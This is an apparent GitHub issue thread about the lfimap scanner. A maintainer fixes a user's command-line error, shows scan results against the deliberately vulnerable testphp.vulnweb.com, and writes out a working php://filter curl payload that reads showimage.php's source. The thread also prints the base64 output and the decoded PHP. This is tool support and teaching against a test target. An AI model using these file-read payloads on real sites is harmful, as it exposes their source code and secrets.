Closed sajeeshab closed 2 years ago
Hi, Thank you for taking an interest in lfimap.
I believe that to fix the issue -U argument is needed, not --url
Please try running lfimap with the following command:
python3 lfimap.py -U http://testphp.vulnweb.com/showimage.php?file=PWN
└─$ python3 lfimap.py -U http://testphp.vulnweb.com/showimage.php?file=PWN -v
[!] Cookie argument ('-C') is not provided. lfimap might have troubles finding vulnerabilities if web app requires a cookie.
[i] Testing filter wrapper...
[+] LFI -> 'http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php'
[i] Testing input wrapper...
[i] Testing data wrapper...
[i] Testing expect wrapper...
[i] Testing remote file inclusion...
[i] Testing file wrapper inclusion...
[i] Testing path truncation using 'wordlists/short.txt' wordlist...
Done.
For me it works well, when '-U' is provided, make sure you cloned last commit from the repo. Please let me know if you solved your problem or need any more info.
@Sajeeshab The vulnerability is sucessfully found and can be confirmed: with the following:
curl "http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php"
PD9waHANCi8vIGhlYWRlcigiQ29udGVudC1MZW5ndGg6IDEiIC8qLiBmaWxlc2l6ZSgkbmFtZSkqLyk7DQppZiggaXNzZXQoJF9HRVRbImZpbGUiXSkgJiYgIWlzc2V0KCRfR0VUWyJzaXplIl0pICl7DQoJLy8gb3BlbiB0aGUgZmlsZSBpbiBhIGJpbmFyeSBtb2RlDQoJaGVhZGVyKCJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciKTsNCgkkbmFtZSA9ICRfR0VUWyJmaWxlIl07DQoJJGZwID0gZm9wZW4oJG5hbWUsICdyYicpOw0KCQ0KCS8vIHNlbmQgdGhlIHJpZ2h0IGhlYWRlcnMNCgloZWFkZXIoIkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZyIpOwkNCgkNCgkvLyBkdW1wIHRoZSBwaWN0dXJlIGFuZCBzdG9wIHRoZSBzY3JpcHQNCglmcGFzc3RocnUoJGZwKTsNCglleGl0Ow0KfQ0KZWxzZWlmIChpc3NldCgkX0dFVFsiZmlsZSJdKSAmJiBpc3NldCgkX0dFVFsic2l6ZSJdKSl7DQoJaGVhZGVyKCJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciKTsNCgkkbmFtZSA9ICRfR0VUWyJmaWxlIl07DQoJJGZwID0gZm9wZW4oJG5hbWUsICdyYicpOw0KCQ0KCS8vIHNlbmQgdGhlIHJpZ2h0IGhlYWRlcnMNCgloZWFkZXIoIkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZyIpOwkNCgkNCgkvLyBkdW1wIHRoZSBwaWN0dXJlIGFuZCBzdG9wIHRoZSBzY3JpcHQNCglmcGFzc3RocnUoJGZwKTsNCglleGl0Ow0KfQ0KPz4gDQo=
To decode output:
echo "PD9waHANCi8vIGhlYWRlcigiQ29udGVudC1MZW5ndGg6IDEiIC8qLiBmaWxlc2l6ZSgkbmFtZSkqLyk7DQppZiggaXNzZXQoJF9HRVRbImZpbGUiXSkgJiYgIWlzc2V0KCRfR0VUWyJzaXplIl0pICl7DQoJLy8gb3BlbiB0aGUgZmlsZSBpbiBhIGJpbmFyeSBtb2RlDQoJaGVhZGVyKCJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciKTsNCgkkbmFtZSA9ICRfR0VUWyJmaWxlIl07DQoJJGZwID0gZm9wZW4oJG5hbWUsICdyYicpOw0KCQ0KCS8vIHNlbmQgdGhlIHJpZ2h0IGhlYWRlcnMNCgloZWFkZXIoIkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZyIpOwkNCgkNCgkvLyBkdW1wIHRoZSBwaWN0dXJlIGFuZCBzdG9wIHRoZSBzY3JpcHQNCglmcGFzc3RocnUoJGZwKTsNCglleGl0Ow0KfQ0KZWxzZWlmIChpc3NldCgkX0dFVFsiZmlsZSJdKSAmJiBpc3NldCgkX0dFVFsic2l6ZSJdKSl7DQoJaGVhZGVyKCJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciKTsNCgkkbmFtZSA9ICRfR0VUWyJmaWxlIl07DQoJJGZwID0gZm9wZW4oJG5hbWUsICdyYicpOw0KCQ0KCS8vIHNlbmQgdGhlIHJpZ2h0IGhlYWRlcnMNCgloZWFkZXIoIkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZyIpOwkNCgkNCgkvLyBkdW1wIHRoZSBwaWN0dXJlIGFuZCBzdG9wIHRoZSBzY3JpcHQNCglmcGFzc3RocnUoJGZwKTsNCglleGl0Ow0KfQ0KPz4gDQo=" | base64 -d
showimage.php code is disclosed, meaning arbitrary file read is possible with base64 exfiltration technique. This is technically not an LFI, but file read vulnerability, since fpassthru function is used and not include/require and content-type in the response headers is image/jpeg.
This means that you can read php source code also with curl http://testphp.vulnweb.com/showimage.php?file=showimage.php
<?php
// header("Content-Length: 1" /*. filesize($name)*/);
if( isset($_GET["file"]) && !isset($_GET["size"]) ){
// open the file in a binary mode
header("Content-Type: image/jpeg");
$name = $_GET["file"];
$fp = fopen($name, 'rb');
// send the right headers
header("Content-Type: image/jpeg");
// dump the picture and stop the script
fpassthru($fp);
exit;
}
elseif (isset($_GET["file"]) && isset($_GET["size"])){
header("Content-Type: image/jpeg");
$name = $_GET["file"];
$fp = fopen($name, 'rb');
// send the right headers
header("Content-Type: image/jpeg");
// dump the picture and stop the script
fpassthru($fp);
exit;
}
?>
Hope this helps.
lfimap.py: error: unrecognized arguments: --url http://testphp.vulnweb.com/showimage.php?file=PWN